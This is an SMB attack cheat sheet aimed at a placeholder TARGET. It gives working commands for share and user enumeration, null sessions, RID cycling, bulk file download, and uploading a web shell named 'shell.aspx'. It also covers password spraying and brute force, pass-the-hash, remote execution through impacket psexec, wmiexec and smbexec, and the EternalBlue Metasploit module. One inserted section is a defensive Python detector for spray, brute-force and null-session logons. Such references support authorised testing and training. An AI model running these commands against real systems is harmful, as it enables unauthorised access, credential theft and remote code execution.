Service Detection

nmap -sV -sC -p 139,445 TARGET

Enumerate Shares

smbclient

smbclient -L //TARGET -N
smbclient -L //TARGET -U user%password

CrackMapExec

crackmapexec smb TARGET -u '' -p '' --shares
crackmapexec smb TARGET -u user -p password --shares

smbmap

smbmap -H TARGET
smbmap -H TARGET -u user -p password
smbmap -H TARGET -u user -p password -R    # Recursive

enum4linux-ng

enum4linux-ng TARGET -A

Null Session

smbclient //TARGET/share -N
rpcclient -U "" -N TARGET

rpcclient Enumeration

rpcclient -U "" -N TARGET
> enumdomusers
> enumdomgroups
> queryuser 0x1f4
> querydispinfo
> lookupnames administrator
> getdompwinfo

Access Share

smbclient //TARGET/sharename -U user%password

Download File

smb: \> get secret.txt
smb: \> mget *.txt

Download Everything

smbclient //TARGET/share -U user%password -c "recurse; prompt off; mget *"

Upload File

smb: \> put shell.aspx

Brute-Force / Password Spray

crackmapexec smb TARGET -u users.txt -p passwords.txt
crackmapexec smb TARGET -u users.txt -p 'Summer2024!' --continue-on-success
hydra -L users.txt -P passwords.txt smb://TARGET
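As an added example (not part of the original cheat sheet), the defender's side of the Null Session and Brute-Force / Password Spray sections above: a small Python detector that flags one source failing against many accounts (spray), one source hammering a single account (brute force), and network logons by ANONYMOUS LOGON (null session). The records are constructed, simplified Windows Security-log style events, and the thresholds and record layout are assumptions.

```python
# Added example: detection logic for SMB password spraying, brute force and
# null-session (anonymous) logons over constructed log records.
# Records are simplified Windows Security-log style tuples (not real captures):
# (event_id, source_ip, account, logon_type); 4625 = failed logon,
# 4624 = successful logon, logon type 3 = network logon (what SMB produces).
from collections import defaultdict

SAMPLE_EVENTS = (
    # one source, one password guess against many accounts: a spray
    [(4625, "10.0.0.50", u, 3) for u in
     ("alice", "bob", "carol", "dave", "erin", "frank")]
    # one source, many guesses against one account: brute force
    + [(4625, "10.0.0.77", "administrator", 3)] * 8
    # anonymous network logon: consistent with a null session
    + [(4624, "10.0.0.88", "ANONYMOUS LOGON", 3)]
    # ordinary successful logon, should not be flagged
    + [(4624, "10.0.0.12", "alice", 3)]
)

# Assumed thresholds; tune to the environment's baseline.
SPRAY_MIN_USERS = 5      # distinct accounts failed from one source
BRUTE_MIN_ATTEMPTS = 8   # failures against a single account from one source


def analyse(events):
    """Return {source_ip: [finding, ...]} for sources worth investigating."""
    failed_by_src = defaultdict(lambda: defaultdict(int))
    findings = defaultdict(list)
    for event_id, src, account, logon_type in events:
        if logon_type != 3:          # only network logons are of interest here
            continue
        if event_id == 4625:
            failed_by_src[src][account] += 1
        elif event_id == 4624 and account.upper() == "ANONYMOUS LOGON":
            # ANONYMOUS LOGON also occurs legitimately; review rather than block
            findings[src].append("null-session")
    for src, per_account in failed_by_src.items():
        if len(per_account) >= SPRAY_MIN_USERS:
            findings[src].append("password-spray")
        for account, n in per_account.items():
            if n >= BRUTE_MIN_ATTEMPTS:
                findings[src].append(f"brute-force:{account}")
    return dict(findings)


if __name__ == "__main__":
    for src, hits in analyse(SAMPLE_EVENTS).items():
        print(src, ", ".join(hits))
```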

User Enumeration

RID Cycling

crackmapexec smb TARGET -u '' -p '' --rid-brute
enum4linux-ng TARGET -R
impacket-lookupsid domain.local/user:password@TARGET

Command Execution

PsExec

impacket-psexec domain.local/user:password@TARGET
impacket-psexec -hashes :NTLM_HASH administrator@TARGET

WMIExec

impacket-wmiexec domain.local/user:password@TARGET

SMBExec

impacket-smbexec domain.local/user:password@TARGET

Pass-the-Hash

crackmapexec smb TARGET -u Administrator -H NTLM_HASH
impacket-psexec -hashes :NTLM_HASH Administrator@TARGET

Known Vulnerabilities

EternalBlue (MS17-010)

nmap -p 445 --script smb-vuln-ms17-010 TARGET
# Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS TARGET
run

SambaCry (CVE-2017-7494)

Linux Samba RCE via writable share:
nmap -p 445 --script smb-vuln-cve-2017-7494 TARGET

NSE Scripts

nmap -p 445 --script smb-enum-shares TARGET
nmap -p 445 --script smb-enum-users TARGET
nmap -p 445 --script smb-os-discovery TARGET
nmap -p 445 --script smb-vuln* TARGET
nmap -p 445 --script smb-protocols TARGET

Quick Reference

Check            Command
List shares      smbclient -L //TARGET -N
Null session     rpcclient -U "" -N TARGET
RID brute        crackmapexec smb TARGET -u '' -p '' --rid-brute
Recursive list   smbmap -H TARGET -R
PsExec           impacket-psexec user:pass@TARGET
EternalBlue      nmap --script smb-vuln-ms17-010 TARGET